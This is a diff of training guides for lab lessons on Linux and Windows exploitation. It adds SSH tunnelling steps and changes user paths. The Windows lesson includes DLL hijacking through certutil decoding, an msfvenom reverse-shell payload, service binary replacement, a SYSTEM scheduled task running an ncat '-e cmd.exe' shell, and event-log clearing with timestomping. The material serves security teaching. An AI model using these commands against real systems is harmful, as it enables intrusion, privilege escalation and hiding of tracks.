Student Guides Updated

security/modules/lessons/pages/lesson-10-linux-exploit_sg.adoc

@@ -23,6 +23,23 @@ xref:ROOT:objectives.adoc#_section_7_2_3_privilege_escalation[Section 7.2.3: Pri
 xref:ROOT:objectives.adoc#_section_7_4_maintaining_persistence[Section 7.4: Maintaining Persistence] +
 xref:ROOT:objectives.adoc#_section_7_5_covering_tracks[Section 7.5: Covering Tracks] +
 
+== Student Demo System
+* Tunnel through Jump box to 10.10.28.42 targeting port 22 for ssh session
+*** example below
+
+[source,bash]
+----
+#from Op station
+ssh student@<JMP_IP> -L RHP:10.10.28.42:22
+#from Op station
+ssh demo1@localhost -p RHP
+########## OR ###################
+#from Op station
+ssh student@<JMP_IP> -D 9050
+#from Op station
+proxychains ssh demo1@10.10.28.42
+----
+
 {empty} +
 
 

security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc

@@ -23,6 +23,18 @@ xref:ROOT:objectives.adoc#_section_7_2_3_privilege_escalation[Section 7.2.3: Pri
 xref:ROOT:objectives.adoc#_section_7_4_maintaining_persistence[Section 7.4: Maintaining Persistence] +
 xref:ROOT:objectives.adoc#_section_7_5_covering_tracks[Section 7.5: Covering Tracks] +
 
+== Student Demo System
+* Tunnel through Jump box to 10.10.28.45 targeting port 3389 for RDP session
+*** example below
+
+[source,bash]
+----
+#from Op station
+ssh student@<JMP_IP> -L RHP:10.10.28.45:3389
+#from Op station
+xfreerdp /u:student /v:localhost:RHP /size:1920x1024 +clipboard
+----
+
 {empty} +
 
 === *REVIEW: User Mode vs. Kernel Mode, Priveleged vs. Unpriveleged*
@@ -318,11 +330,11 @@ IMPORTANT: We want to identify anything running in non-standard locations as wel
 .. Open and view tasks from the Task Scheduler GUI Application
 
 . Identify the following vulnerable Task:
-* ``C:\Users\user\exercise_2\putty.exe``
+* ``C:\Users\student\exercise_2\putty.exe``
 
-. Run: ``sigcheck c:\users\user\exercise_2\putty.exe``
+. Run: ``sigcheck c:\users\student\exercise_2\putty.exe``
 * Determines information we can use to research for vulnerabilities
-. Run: ``icacls "c:\users\user\exercise_2"``
+. Run: ``icacls "c:\users\student\exercise_2"``
 * Check if the directory can be written to, as it is non-standard
 
 {empty} +
@@ -333,7 +345,7 @@ IMPORTANT: We want to identify anything running in non-standard locations as wel
 *Process Monitor*
 
 . Run: ``procmon /AcceptEula``
-. Run: ``C:\Users\user\exercise_2\putty.exe`` 
+. Run: ``C:\Users\student\exercise_2\putty.exe`` 
 . Configure the following filters by pressing ``CTRL + L`` to open the filter menu:
 .. *Process Name* contains ``putty.exe``
 .. *Path* contains ``.dll``
@@ -397,7 +409,7 @@ Once the malicious dll has been created, it must be uploaded to the host. Use of
 * Run: ``move base64.txt base64``
 * Run: ``certutil -decode base64 ntmarta.dll``
 . Put the retrieved DLL in the same location as the vulnerable Putty executable
-* Run: ``copy "PATH OF MALICIOUS DLL"  "c:\users\user\exercise_2\ntmarta.dll"``
+* Run: ``copy "PATH OF MALICIOUS DLL"  "c:\users\student\exercise_2\ntmarta.dll"``
 . Allow for Putty to execute with scheduled task
 
 If the above steps were followed, a command prompt or two will flash on the screen, and a text file will be created in the same location where putty is.
@@ -455,10 +467,12 @@ NOTE: We are interested in binaries running as *SYSTEM* in locations where *BUIL
 *Exploiting a vulnerable Service* +
 The overall intent is to replace the legitimate service with an executable that will allow an attacker to accomplish their objective.
 
+. (Optional) Create a malicious executable file via MSFVenom
+*`` msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f exe > 7z.exe
 . Create a backup copy of 7z.exe
 * `` copy 7z.exe 7z.blk.exe``
 . Copy a malicious executable into 7z.exe old location
-* ``copy "c:\Users\user\setup\fetchable\networkedservice2.exe" "c:\Program Files\7-Zip\7z.exe``
+* ``copy "c:\Users\student\setup\fetchable\networkedservice2.exe" "c:\Program Files\7-Zip\7z.exe``
 
 NOTE: *networkedservice2* is a malicious service, but any executable can be transfered to the target and used
 
@@ -548,7 +562,7 @@ As mentioned earlier, ``SYSTEM`` is both an integrity level and a user account.
 * ``net start cmd``
 . Create a scheduled task that runs a listening ncat.exe as *SYSTEM*
 * Create the Scheduled Task
-** ``schtasks /create /tn "ncat" /ru SYSTEM /RL HIGHEST /tr "c:\users\user\setup\fetchable\ncat.exe -lp 65000 -e cmd.exe" /sc Minute``
+** ``schtasks /create /tn "ncat" /ru SYSTEM /RL HIGHEST /tr "c:\users\student\setup\fetchable\ncat.exe -lp 65000 -e cmd.exe" /sc Minute``
 * Validate the task was created
 ** ``schtasks /query /fo LIST /v | Select-String -Pattern "SYSTEM" -CaseSensitive -Context 6,0``
 * Show the task running 
@@ -828,7 +842,7 @@ Auditing tracks the activity of users and processes by recording selected types
 auditpol /get /category:*
     # Basic: Shows all audit category setting
 
-auditpol /get /category:* \|findstr /i "success failure"
+auditpol /get /category:* |findstr /i "success failure"
     # Show all audit category set for success, failure, or success and fail
 
 auditpol /list /subcategory:"detailed Tracking","DS Access"
@@ -1059,7 +1073,7 @@ Clear-Eventlog -Log Application, System
 
 
 . Place ncat.exe inside c:\windows\system32
-* ``copy "c:\users\user\setup\fetchable\ncat.exe" c:\windows\system32``
+* ``copy "c:\users\student\setup\fetchable\ncat.exe" c:\windows\system32``
 . Find a .dll without a assocated exe dir c:\windows\system32. Lets use wksprtPS.dll
 . Grab wksprtPS.dll times. +
 * ``powershell -command "get-childitem c:\windows\system32\wksprtPS.dll -force | select-object creationtime,lastaccesstime,lastwrittime"``